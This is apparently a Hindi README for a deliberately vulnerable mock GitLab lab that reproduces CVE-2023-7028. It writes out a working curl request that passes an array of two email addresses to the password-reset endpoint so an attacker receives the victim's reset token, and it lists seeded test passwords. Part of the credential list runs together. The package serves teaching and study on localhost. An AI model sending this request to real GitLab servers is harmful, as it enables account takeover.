
मॉक कमजोर GitLab इंस्टेंस जो CVE-2023-7028 पासवर्ड रीसेट हाईजैक को दोहराता है। ऐरे-आधारित ईमेल पैरामीटर शोषण और अकाउंट टेकओवर का प्रदर्शन करता है। केवल शैक्षिक लैब उपयोग के लिए।
CVE-2023-7028 (CVSS 10.0): POST /users/password ने user[email][] ऐरे स्वीकार किया — सर्वर ने email[0] द्वारा उपयोगकर्ता ढूंढा लेकिन वही रीसेट टोकन हर पते पर भेज दिया → [email protected] वाला हमलावर [email protected] को हाईजैक कर लेता है।
प्रभावित: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. यह मॉक 16.6.0 की कमजोर प्रक्रिया को दोहराता है (JSON DB, कोई SMTP नहीं)।
npm install && npm start → http://127.0.0.1:3000 (या PORT=3001 npm start; व्यस्त होने पर स्वतः पुनः प्रयास; केवल localhost)।
सीडेड: [email protected]/s3cur3P@ss!, , में।
[email protected]/BobSecure1![email protected]/5iveL!fedata/users.jsoncurl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]"
http://127.0.0.1:3000/mailbox या /api/emails जाँचें — दोनों को एक ही टोकन मिलता है। अधिग्रहण के लिए .../users/password/edit?reset_password_token=TOKEN खोलें।
सामान्य: user[email][email protected] → एक मेल। मेलबॉक्स हर मेल दिखाता है; कुछ भी होस्ट से बाहर नहीं जाता।
MIT — केवल प्रयोगशाला के लिए, बाहर उजागर न करें।